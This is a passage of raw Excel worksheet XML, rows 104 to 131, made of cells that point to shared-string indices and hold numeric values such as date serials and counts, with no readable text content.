      <c r="D104" s="96">
        <v>101</v>
      </c>
      <c r="E104" s="95" t="s">
        <v>519</v>
      </c>
      <c r="F104" s="42">
        <v>101</v>
      </c>
      <c r="G104" s="95" t="s">
        <v>520</v>
      </c>
      <c r="H104" t="s">
        <v>521</v>
      </c>
      <c r="I104" t="s">
        <v>172</v>
      </c>
      <c r="J104" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K104" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L104" t="s">
        <v>83</v>
      </c>
      <c r="M104" s="95" t="s">
        <v>72</v>
      </c>
      <c r="N104" t="s">
        <v>522</v>
      </c>
      <c r="Q104" s="95" t="s">
        <v>523</v>
      </c>
      <c r="R104">
        <v>168</v>
      </c>
      <c r="S104">
        <v>210</v>
      </c>
      <c r="T104">
        <v>173</v>
      </c>
      <c r="U104">
        <v>376</v>
      </c>
      <c r="V104">
        <v>2432</v>
      </c>
      <c r="W104" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="105" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A105" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B105" s="52">
        <v>43161.686450138892</v>
      </c>
      <c r="C105" s="95" t="s">
        <v>524</v>
      </c>
      <c r="D105" s="96">
        <v>100</v>
      </c>
      <c r="E105" s="95" t="s">
        <v>525</v>
      </c>
      <c r="F105" s="42">
        <v>100</v>
      </c>
      <c r="G105" s="95" t="s">
        <v>526</v>
      </c>
      <c r="H105" t="s">
        <v>527</v>
      </c>
      <c r="I105" t="s">
        <v>528</v>
      </c>
      <c r="J105" s="95" t="s">
        <v>529</v>
      </c>
      <c r="K105" s="95" t="s">
        <v>39</v>
      </c>
      <c r="L105" t="s">
        <v>83</v>
      </c>
      <c r="M105" s="95" t="s">
        <v>72</v>
      </c>
      <c r="P105" t="s">
        <v>530</v>
      </c>
      <c r="Q105" s="95" t="s">
        <v>531</v>
      </c>
      <c r="R105">
        <v>20028</v>
      </c>
      <c r="S105">
        <v>16725</v>
      </c>
      <c r="T105">
        <v>41850</v>
      </c>
      <c r="U105">
        <v>76931</v>
      </c>
      <c r="V105">
        <v>70855</v>
      </c>
      <c r="W105" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="106" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A106" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B106" s="52">
        <v>44121.405996990739</v>
      </c>
      <c r="C106" s="95" t="s">
        <v>532</v>
      </c>
      <c r="D106" s="96">
        <v>100</v>
      </c>
      <c r="E106" s="95" t="s">
        <v>533</v>
      </c>
      <c r="F106" s="42">
        <v>100</v>
      </c>
      <c r="G106" s="95" t="s">
        <v>534</v>
      </c>
      <c r="H106" t="s">
        <v>535</v>
      </c>
      <c r="I106" t="s">
        <v>268</v>
      </c>
      <c r="J106" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K106" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L106" t="s">
        <v>77</v>
      </c>
      <c r="M106" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N106" t="s">
        <v>291</v>
      </c>
      <c r="O106" s="95" t="s">
        <v>536</v>
      </c>
      <c r="Q106" s="95" t="s">
        <v>537</v>
      </c>
      <c r="R106">
        <v>38</v>
      </c>
      <c r="S106">
        <v>20</v>
      </c>
      <c r="T106">
        <v>45</v>
      </c>
      <c r="U106">
        <v>16</v>
      </c>
      <c r="V106">
        <v>10</v>
      </c>
      <c r="W106" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="107" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A107" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B107" s="52">
        <v>44428.640736527777</v>
      </c>
      <c r="C107" s="95" t="s">
        <v>538</v>
      </c>
      <c r="D107" s="96">
        <v>110</v>
      </c>
      <c r="E107" s="95" t="s">
        <v>539</v>
      </c>
      <c r="F107" s="42">
        <v>110</v>
      </c>
      <c r="G107" s="95" t="s">
        <v>540</v>
      </c>
      <c r="H107" t="s">
        <v>541</v>
      </c>
      <c r="I107" t="s">
        <v>185</v>
      </c>
      <c r="J107" s="95" t="s">
        <v>542</v>
      </c>
      <c r="K107" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L107" t="s">
        <v>83</v>
      </c>
      <c r="M107" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q107" s="95" t="s">
        <v>543</v>
      </c>
      <c r="R107">
        <v>10152</v>
      </c>
      <c r="S107">
        <v>50987</v>
      </c>
      <c r="T107">
        <v>85928</v>
      </c>
      <c r="U107">
        <v>71603</v>
      </c>
      <c r="V107">
        <v>69343</v>
      </c>
      <c r="W107" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="108" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A108" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B108" s="52"/>
      <c r="C108" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D108" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E108" s="95" t="s">
        <v>544</v>
      </c>
      <c r="F108" s="42">
        <v>100</v>
      </c>
      <c r="G108" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H108" t="s">
        <v>545</v>
      </c>
      <c r="I108" t="s">
        <v>546</v>
      </c>
      <c r="J108" s="95" t="s">
        <v>547</v>
      </c>
      <c r="K108" s="95" t="s">
        <v>20</v>
      </c>
      <c r="L108" t="s">
        <v>83</v>
      </c>
      <c r="M108" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q108" s="95" t="s">
        <v>176</v>
      </c>
      <c r="W108" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="109" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A109" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B109" s="52"/>
      <c r="C109" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D109" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E109" s="95" t="s">
        <v>548</v>
      </c>
      <c r="F109" s="42">
        <v>100</v>
      </c>
      <c r="G109" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H109" t="s">
        <v>549</v>
      </c>
      <c r="I109" t="s">
        <v>546</v>
      </c>
      <c r="J109" s="95" t="s">
        <v>547</v>
      </c>
      <c r="K109" s="95" t="s">
        <v>20</v>
      </c>
      <c r="L109" t="s">
        <v>83</v>
      </c>
      <c r="M109" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q109" s="95" t="s">
        <v>550</v>
      </c>
      <c r="W109" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="110" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A110" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B110" s="52">
        <v>44495.711635706015</v>
      </c>
      <c r="C110" s="95" t="s">
        <v>551</v>
      </c>
      <c r="D110" s="96">
        <v>121</v>
      </c>
      <c r="E110" s="95" t="s">
        <v>552</v>
      </c>
      <c r="F110" s="42">
        <v>100</v>
      </c>
      <c r="G110" s="95" t="s">
        <v>553</v>
      </c>
      <c r="H110" t="s">
        <v>554</v>
      </c>
      <c r="I110" t="s">
        <v>75</v>
      </c>
      <c r="J110" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K110" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L110" t="s">
        <v>77</v>
      </c>
      <c r="M110" s="95" t="s">
        <v>236</v>
      </c>
      <c r="O110" s="95" t="s">
        <v>555</v>
      </c>
      <c r="Q110" s="95" t="s">
        <v>556</v>
      </c>
      <c r="T110">
        <v>306</v>
      </c>
      <c r="U110">
        <v>59</v>
      </c>
      <c r="V110">
        <v>1639</v>
      </c>
      <c r="W110" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="111" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A111" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B111" s="52">
        <v>44495.71163568287</v>
      </c>
      <c r="C111" s="95" t="s">
        <v>551</v>
      </c>
      <c r="D111" s="96">
        <v>121</v>
      </c>
      <c r="E111" s="95" t="s">
        <v>557</v>
      </c>
      <c r="F111" s="42">
        <v>112</v>
      </c>
      <c r="G111" s="95" t="s">
        <v>558</v>
      </c>
      <c r="H111" t="s">
        <v>559</v>
      </c>
      <c r="I111" t="s">
        <v>75</v>
      </c>
      <c r="J111" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K111" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L111" t="s">
        <v>77</v>
      </c>
      <c r="M111" s="95" t="s">
        <v>236</v>
      </c>
      <c r="O111" s="95" t="s">
        <v>560</v>
      </c>
      <c r="Q111" s="95" t="s">
        <v>556</v>
      </c>
      <c r="R111">
        <v>15271</v>
      </c>
      <c r="S111">
        <v>16380</v>
      </c>
      <c r="T111">
        <v>19590</v>
      </c>
      <c r="U111">
        <v>14146</v>
      </c>
      <c r="V111">
        <v>38255</v>
      </c>
      <c r="W111" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="112" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A112" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B112" s="52"/>
      <c r="C112" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D112" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E112" s="95" t="s">
        <v>561</v>
      </c>
      <c r="F112" s="42">
        <v>100</v>
      </c>
      <c r="G112" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H112" t="s">
        <v>562</v>
      </c>
      <c r="I112" t="s">
        <v>82</v>
      </c>
      <c r="J112" s="95" t="s">
        <v>43</v>
      </c>
      <c r="K112" s="95" t="s">
        <v>32</v>
      </c>
      <c r="L112" t="s">
        <v>83</v>
      </c>
      <c r="M112" s="95" t="s">
        <v>72</v>
      </c>
      <c r="P112" t="s">
        <v>563</v>
      </c>
      <c r="Q112" s="95" t="s">
        <v>85</v>
      </c>
      <c r="W112" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="113" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A113" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B113" s="52"/>
      <c r="C113" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D113" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E113" s="95" t="s">
        <v>564</v>
      </c>
      <c r="F113" s="42">
        <v>200</v>
      </c>
      <c r="G113" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H113" t="s">
        <v>565</v>
      </c>
      <c r="I113" t="s">
        <v>268</v>
      </c>
      <c r="J113" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K113" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L113" t="s">
        <v>77</v>
      </c>
      <c r="M113" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N113" t="s">
        <v>291</v>
      </c>
      <c r="P113" t="s">
        <v>567</v>
      </c>
      <c r="Q113" s="95" t="s">
        <v>568</v>
      </c>
      <c r="W113" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="114" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A114" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B114" s="52"/>
      <c r="C114" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D114" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E114" s="95" t="s">
        <v>564</v>
      </c>
      <c r="F114" s="42">
        <v>100</v>
      </c>
      <c r="G114" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H114" t="s">
        <v>569</v>
      </c>
      <c r="I114" t="s">
        <v>268</v>
      </c>
      <c r="J114" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K114" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L114" t="s">
        <v>77</v>
      </c>
      <c r="M114" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N114" t="s">
        <v>291</v>
      </c>
      <c r="P114" t="s">
        <v>567</v>
      </c>
      <c r="Q114" s="95" t="s">
        <v>570</v>
      </c>
      <c r="W114" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="115" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A115" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B115" s="52">
        <v>44134.718092777781</v>
      </c>
      <c r="C115" s="95" t="s">
        <v>571</v>
      </c>
      <c r="D115" s="96">
        <v>300</v>
      </c>
      <c r="E115" s="95" t="s">
        <v>572</v>
      </c>
      <c r="F115" s="42">
        <v>300</v>
      </c>
      <c r="G115" s="95" t="s">
        <v>573</v>
      </c>
      <c r="H115" t="s">
        <v>574</v>
      </c>
      <c r="I115" t="s">
        <v>75</v>
      </c>
      <c r="J115" s="95" t="s">
        <v>454</v>
      </c>
      <c r="K115" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L115" t="s">
        <v>77</v>
      </c>
      <c r="O115" s="95" t="s">
        <v>576</v>
      </c>
      <c r="P115" t="s">
        <v>577</v>
      </c>
      <c r="Q115" s="95" t="s">
        <v>578</v>
      </c>
      <c r="R115">
        <v>15211</v>
      </c>
      <c r="S115">
        <v>13997</v>
      </c>
      <c r="T115">
        <v>12962</v>
      </c>
      <c r="U115">
        <v>13394</v>
      </c>
      <c r="V115">
        <v>14329</v>
      </c>
      <c r="W115" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="116" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A116" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B116" s="52">
        <v>44134.718092754629</v>
      </c>
      <c r="C116" s="95" t="s">
        <v>571</v>
      </c>
      <c r="D116" s="96">
        <v>300</v>
      </c>
      <c r="E116" s="95" t="s">
        <v>579</v>
      </c>
      <c r="F116" s="42">
        <v>200</v>
      </c>
      <c r="G116" s="95" t="s">
        <v>580</v>
      </c>
      <c r="H116" t="s">
        <v>581</v>
      </c>
      <c r="I116" t="s">
        <v>75</v>
      </c>
      <c r="J116" s="95" t="s">
        <v>454</v>
      </c>
      <c r="K116" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L116" t="s">
        <v>77</v>
      </c>
      <c r="O116" s="95" t="s">
        <v>582</v>
      </c>
      <c r="P116" t="s">
        <v>577</v>
      </c>
      <c r="Q116" s="95" t="s">
        <v>578</v>
      </c>
      <c r="R116">
        <v>2</v>
      </c>
      <c r="S116">
        <v>1589</v>
      </c>
      <c r="T116">
        <v>80523</v>
      </c>
      <c r="W116" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="117" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A117" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B117" s="52">
        <v>44134.71809278935</v>
      </c>
      <c r="C117" s="95" t="s">
        <v>571</v>
      </c>
      <c r="D117" s="96">
        <v>300</v>
      </c>
      <c r="E117" s="95" t="s">
        <v>583</v>
      </c>
      <c r="F117" s="42">
        <v>200</v>
      </c>
      <c r="G117" s="95" t="s">
        <v>584</v>
      </c>
      <c r="H117" t="s">
        <v>585</v>
      </c>
      <c r="I117" t="s">
        <v>75</v>
      </c>
      <c r="J117" s="95" t="s">
        <v>454</v>
      </c>
      <c r="K117" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L117" t="s">
        <v>77</v>
      </c>
      <c r="O117" s="95" t="s">
        <v>576</v>
      </c>
      <c r="P117" t="s">
        <v>577</v>
      </c>
      <c r="Q117" s="95" t="s">
        <v>578</v>
      </c>
      <c r="R117">
        <v>28831</v>
      </c>
      <c r="S117">
        <v>26056</v>
      </c>
      <c r="T117">
        <v>26160</v>
      </c>
      <c r="U117">
        <v>28561</v>
      </c>
      <c r="V117">
        <v>31609</v>
      </c>
      <c r="W117" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="118" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A118" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B118" s="52">
        <v>44134.718092743053</v>
      </c>
      <c r="C118" s="95" t="s">
        <v>571</v>
      </c>
      <c r="D118" s="96">
        <v>300</v>
      </c>
      <c r="E118" s="95" t="s">
        <v>586</v>
      </c>
      <c r="F118" s="42">
        <v>200</v>
      </c>
      <c r="G118" s="95" t="s">
        <v>587</v>
      </c>
      <c r="H118" t="s">
        <v>588</v>
      </c>
      <c r="I118" t="s">
        <v>75</v>
      </c>
      <c r="J118" s="95" t="s">
        <v>454</v>
      </c>
      <c r="K118" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L118" t="s">
        <v>77</v>
      </c>
      <c r="O118" s="95" t="s">
        <v>582</v>
      </c>
      <c r="P118" t="s">
        <v>577</v>
      </c>
      <c r="Q118" s="95" t="s">
        <v>578</v>
      </c>
      <c r="R118">
        <v>3485738</v>
      </c>
      <c r="S118">
        <v>3255172</v>
      </c>
      <c r="T118">
        <v>3390772</v>
      </c>
      <c r="U118">
        <v>3152973</v>
      </c>
      <c r="V118">
        <v>3622791</v>
      </c>
      <c r="W118" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="119" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A119" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B119" s="52">
        <v>44134.718092800926</v>
      </c>
      <c r="C119" s="95" t="s">
        <v>571</v>
      </c>
      <c r="D119" s="96">
        <v>300</v>
      </c>
      <c r="E119" s="95" t="s">
        <v>589</v>
      </c>
      <c r="F119" s="42">
        <v>200</v>
      </c>
      <c r="G119" s="95" t="s">
        <v>590</v>
      </c>
      <c r="H119" t="s">
        <v>591</v>
      </c>
      <c r="I119" t="s">
        <v>75</v>
      </c>
      <c r="J119" s="95" t="s">
        <v>454</v>
      </c>
      <c r="K119" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L119" t="s">
        <v>77</v>
      </c>
      <c r="O119" s="95" t="s">
        <v>576</v>
      </c>
      <c r="P119" t="s">
        <v>577</v>
      </c>
      <c r="Q119" s="95" t="s">
        <v>578</v>
      </c>
      <c r="R119">
        <v>309850</v>
      </c>
      <c r="S119">
        <v>299634</v>
      </c>
      <c r="T119">
        <v>290293</v>
      </c>
      <c r="U119">
        <v>303099</v>
      </c>
      <c r="V119">
        <v>356297</v>
      </c>
      <c r="W119" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="120" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A120" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B120" s="52">
        <v>44134.718092766205</v>
      </c>
      <c r="C120" s="95" t="s">
        <v>571</v>
      </c>
      <c r="D120" s="96">
        <v>300</v>
      </c>
      <c r="E120" s="95" t="s">
        <v>592</v>
      </c>
      <c r="F120" s="42">
        <v>300</v>
      </c>
      <c r="G120" s="95" t="s">
        <v>593</v>
      </c>
      <c r="H120" t="s">
        <v>594</v>
      </c>
      <c r="I120" t="s">
        <v>75</v>
      </c>
      <c r="J120" s="95" t="s">
        <v>454</v>
      </c>
      <c r="K120" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L120" t="s">
        <v>77</v>
      </c>
      <c r="O120" s="95" t="s">
        <v>582</v>
      </c>
      <c r="P120" t="s">
        <v>577</v>
      </c>
      <c r="Q120" s="95" t="s">
        <v>578</v>
      </c>
      <c r="R120">
        <v>524133</v>
      </c>
      <c r="S120">
        <v>500477</v>
      </c>
      <c r="T120">
        <v>500874</v>
      </c>
      <c r="U120">
        <v>500728</v>
      </c>
      <c r="V120">
        <v>602091</v>
      </c>
      <c r="W120" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="121" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A121" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B121" s="52">
        <v>44134.718092812502</v>
      </c>
      <c r="C121" s="95" t="s">
        <v>571</v>
      </c>
      <c r="D121" s="96">
        <v>300</v>
      </c>
      <c r="E121" s="95" t="s">
        <v>595</v>
      </c>
      <c r="F121" s="42">
        <v>200</v>
      </c>
      <c r="G121" s="95" t="s">
        <v>596</v>
      </c>
      <c r="H121" t="s">
        <v>597</v>
      </c>
      <c r="I121" t="s">
        <v>75</v>
      </c>
      <c r="J121" s="95" t="s">
        <v>454</v>
      </c>
      <c r="K121" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L121" t="s">
        <v>77</v>
      </c>
      <c r="O121" s="95" t="s">
        <v>582</v>
      </c>
      <c r="P121" t="s">
        <v>577</v>
      </c>
      <c r="Q121" s="95" t="s">
        <v>578</v>
      </c>
      <c r="R121">
        <v>151906</v>
      </c>
      <c r="S121">
        <v>147659</v>
      </c>
      <c r="T121">
        <v>150650</v>
      </c>
      <c r="U121">
        <v>154765</v>
      </c>
      <c r="V121">
        <v>180140</v>
      </c>
      <c r="W121" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="122" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A122" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B122" s="52"/>
      <c r="C122" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D122" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E122" s="95" t="s">
        <v>598</v>
      </c>
      <c r="F122" s="42">
        <v>100</v>
      </c>
      <c r="G122" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H122" t="s">
        <v>599</v>
      </c>
      <c r="I122" t="s">
        <v>75</v>
      </c>
      <c r="J122" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K122" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L122" t="s">
        <v>77</v>
      </c>
      <c r="M122" s="95" t="s">
        <v>237</v>
      </c>
      <c r="N122" t="s">
        <v>238</v>
      </c>
      <c r="Q122" s="95" t="s">
        <v>600</v>
      </c>
      <c r="W122" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="123" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A123" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B123" s="52"/>
      <c r="C123" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D123" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E123" s="95" t="s">
        <v>601</v>
      </c>
      <c r="F123" s="42">
        <v>100</v>
      </c>
      <c r="G123" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H123" t="s">
        <v>379</v>
      </c>
      <c r="I123" t="s">
        <v>75</v>
      </c>
      <c r="J123" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K123" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L123" t="s">
        <v>77</v>
      </c>
      <c r="M123" s="95" t="s">
        <v>237</v>
      </c>
      <c r="N123" t="s">
        <v>238</v>
      </c>
      <c r="Q123" s="95" t="s">
        <v>239</v>
      </c>
      <c r="W123" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="124" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A124" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B124" s="52"/>
      <c r="C124" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D124" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E124" s="95" t="s">
        <v>602</v>
      </c>
      <c r="F124" s="42">
        <v>100</v>
      </c>
      <c r="G124" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H124" t="s">
        <v>603</v>
      </c>
      <c r="I124" t="s">
        <v>103</v>
      </c>
      <c r="J124" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K124" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L124" t="s">
        <v>77</v>
      </c>
      <c r="M124" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P124" t="s">
        <v>604</v>
      </c>
      <c r="Q124" s="95" t="s">
        <v>605</v>
      </c>
      <c r="W124" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="125" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A125" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B125" s="52"/>
      <c r="C125" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D125" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E125" s="95" t="s">
        <v>606</v>
      </c>
      <c r="F125" s="42">
        <v>100</v>
      </c>
      <c r="G125" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H125" t="s">
        <v>607</v>
      </c>
      <c r="I125" t="s">
        <v>75</v>
      </c>
      <c r="J125" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K125" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L125" t="s">
        <v>77</v>
      </c>
      <c r="M125" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N125" t="s">
        <v>91</v>
      </c>
      <c r="Q125" s="95" t="s">
        <v>608</v>
      </c>
      <c r="W125" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="126" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A126" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B126" s="52"/>
      <c r="C126" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D126" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E126" s="95" t="s">
        <v>609</v>
      </c>
      <c r="F126" s="42">
        <v>100</v>
      </c>
      <c r="G126" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H126" t="s">
        <v>610</v>
      </c>
      <c r="I126" t="s">
        <v>611</v>
      </c>
      <c r="J126" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K126" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L126" t="s">
        <v>77</v>
      </c>
      <c r="M126" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N126" t="s">
        <v>613</v>
      </c>
      <c r="P126" t="s">
        <v>612</v>
      </c>
      <c r="Q126" s="95" t="s">
        <v>614</v>
      </c>
      <c r="W126" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="127" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A127" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B127" s="52"/>
      <c r="C127" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D127" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E127" s="95" t="s">
        <v>615</v>
      </c>
      <c r="F127" s="42">
        <v>100</v>
      </c>
      <c r="G127" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H127" t="s">
        <v>616</v>
      </c>
      <c r="I127" t="s">
        <v>75</v>
      </c>
      <c r="J127" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K127" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L127" t="s">
        <v>77</v>
      </c>
      <c r="M127" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N127" t="s">
        <v>91</v>
      </c>
      <c r="Q127" s="95" t="s">
        <v>465</v>
      </c>
      <c r="W127" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="128" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A128" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B128" s="52"/>
      <c r="C128" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D128" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E128" s="95" t="s">
        <v>617</v>
      </c>
      <c r="F128" s="42">
        <v>100</v>
      </c>
      <c r="G128" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H128" t="s">
        <v>618</v>
      </c>
      <c r="I128" t="s">
        <v>75</v>
      </c>
      <c r="J128" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K128" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L128" t="s">
        <v>77</v>
      </c>
      <c r="M128" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N128" t="s">
        <v>91</v>
      </c>
      <c r="Q128" s="95" t="s">
        <v>619</v>
      </c>
      <c r="W128" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="129" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A129" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B129" s="52"/>
      <c r="C129" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D129" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E129" s="95" t="s">
        <v>620</v>
      </c>
      <c r="F129" s="42">
        <v>100</v>
      </c>
      <c r="G129" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H129" t="s">
        <v>621</v>
      </c>
      <c r="I129" t="s">
        <v>268</v>
      </c>
      <c r="J129" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K129" s="95" t="s">
        <v>12</v>
      </c>
      <c r="L129" t="s">
        <v>77</v>
      </c>
      <c r="M129" s="95" t="s">
        <v>622</v>
      </c>
      <c r="N129" t="s">
        <v>623</v>
      </c>
      <c r="P129" t="s">
        <v>567</v>
      </c>
      <c r="Q129" s="95" t="s">
        <v>176</v>
      </c>
      <c r="W129" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="130" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A130" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B130" s="52"/>
      <c r="C130" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D130" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E130" s="95" t="s">
        <v>624</v>
      </c>
      <c r="F130" s="42">
        <v>100</v>
      </c>
      <c r="G130" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H130" t="s">
        <v>625</v>
      </c>
      <c r="I130" t="s">
        <v>179</v>
      </c>
      <c r="J130" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K130" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L130" t="s">
        <v>77</v>
      </c>
      <c r="P130" t="s">
        <v>181</v>
      </c>
      <c r="Q130" s="95" t="s">
        <v>626</v>
      </c>
      <c r="W130" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="131" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A131" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B131" s="52"/>
      <c r="C131" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D131" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E131" s="95" t="s">
        <v>627</v>
